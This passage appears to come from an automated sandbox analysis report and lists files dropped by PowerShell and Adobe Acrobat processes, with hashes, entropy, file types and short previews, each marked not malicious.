Preview:	PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\MSIc6230.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.4963635481307946
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88ClWlxCH:Qw946cPbiOxDlbYnuRKdrxw
MD5:	557703FF2105E65ABD307F59B71BABBD
SHA1:	E3A22F35744A1E7B242C1B283A900F4DB59C6854
SHA-256:	F8CD1DCFB2676BDB3E9A3DA421A884502AC5AFCA916192FEEE0FF45C9584065A
SHA-512:	5ACF92FDF339AB5E2E4A746B59F5C61D7DC29524CC0BFBD5F7CF6A710E13C869E71BD9E78A08ED5D8095BCCD00A4FD9FAD117B327A6AB8F0E13F7EC62B3DB121
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.1./.0.1./.2.0.2.5. . .2.2.:.1.9.:.1.3. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1dyulfu.oiu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_la55ntkg.tfi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnpzdqkj.jb1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqlw24p5.se2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxtlxmmw.ilm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgvpdo5u.zza.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xs5s4kwg.uz2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zd4tuhg5.4wk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkjcx3xo.xeg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyn4rqm3.3gp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91c6ru5z_p384v2_62s.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
Category:	dropped
Size (bytes):	144514
Entropy (8bit):	7.992637131260696
Encrypted:	true
SSDEEP:	3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
MD5:	BA1716D4FB435DA6C47CE77E3667E6A8
SHA1:	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
SHA-256:	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
SHA-512:	65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
Malicious:	false
Preview:	PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..\|....,.A.....Z..a<.C._..../G\|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.\|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r\|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?\|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9qcwiem_p384uz_62s.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
Category:	dropped
Size (bytes):	144514
Entropy (8bit):	7.992637131260696
Encrypted:	true
SSDEEP:	3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
MD5:	BA1716D4FB435DA6C47CE77E3667E6A8
SHA1:	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
SHA-256:	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
SHA-512:	65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
Malicious:	false
Preview:	PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..\|....,.A.....Z..a<.C._..../G\|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.\|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r\|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?\|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 22-19-08-165.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.345946398610936
Encrypted:	false
SSDEEP:	384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
MD5:	8947C10F5AB6CFFFAE64BCA79B5A0BE3
SHA1:	70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
SHA-256:	4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
SHA-512:	B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
Malicious:	false
Preview:	SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.319033134729269
Encrypted:	false
SSDEEP:	384:ZD5ywKl9AdQSFoV0k5KQ1HYFByXBnVIVkVjNukg+bPPrHZIGAmyydpnInIVkeFrh:OaS6S5
MD5:	94BCBA543140DE2DD932F882C7788CDF
SHA1:	A1600117FEFC97E6385AB2816123E30CCFF49C72
SHA-256:	329264C3116A9E846311687799EACFA6EBF6CDBF3D385964C6149BEF4C1FEAB0
SHA-512:	15BA9BA7264C6C6DC97E207FFB61A17C652A010CACA8FD7AAC3CDB2DB44B898B9B44EF992280ECA52FFEE58C7120EA2AB6B3A2C2EA1042D7B196AF776C6529B6
Malicious:	false
Preview:	SessionID=ce4b06c0-412c-4073-b180-0702e5b4072a.1736651948178 Timestamp=2025-01-11T22:19:08:178-0500 ThreadID=7700 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=ce4b06c0-412c-4073-b180-0702e5b4072a.1736651948178 Timestamp=2025-01-11T22:19:08:180-0500 ThreadID=7700 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=ce4b06c0-412c-4073-b180-0702e5b4072a.1736651948178 Timestamp=2025-01-11T22:19:08:180-0500 ThreadID=7700 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=ce4b06c0-412c-4073-b180-0702e5b4072a.1736651948178 Timestamp=2025-01-11T22:19:08:180-0500 ThreadID=7700 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=ce4b06c0-412c-4073-b180-0702e5b4072a.1736651948178 Timestamp=2025-01-11T22:19:08:181-0500 ThreadID=7700 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.388798201104369
Encrypted:	false
SSDEEP:	768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2ri:e
MD5:	FB9151DED3916A6A4C2F7F7D782DCFE4
SHA1:	869DD7A85E869560F0E6FD9DB08CE57F05C4A3CD
SHA-256:	7D350DB82C24329A513BAD8646D391D4A0B422C6BA6A89F0D0087E14A81D8F1B
SHA-512:	472EF1477115FA71547A1773B7F9130225F1D2819936E213E57B5C25124221EC78F09CBAF9AF9008398DAC4FB61F04E3E3098FD384F1B296A1827C8CD35CCFB8
Malicious:	false
Preview:	03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : *************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***********************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\0e6cbf14-e031-4cec-8b63-c1aab9f7a4c7.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\66f5c030-d748-4989-bcbd-5132a0a8f4bc.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
MD5:	18E3D04537AF72FDBEB3760B2D10C80E
SHA1:	B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
SHA-256:	BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
SHA-512:	2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\6abecb7e-08fd-442d-af3a-b667adccf739.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\b394f835-3b8d-4397-a77e-47130fa01f99.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
MD5:	716C2C392DCD15C95BBD760EEBABFCD0
SHA1:	4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
SHA-256:	DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
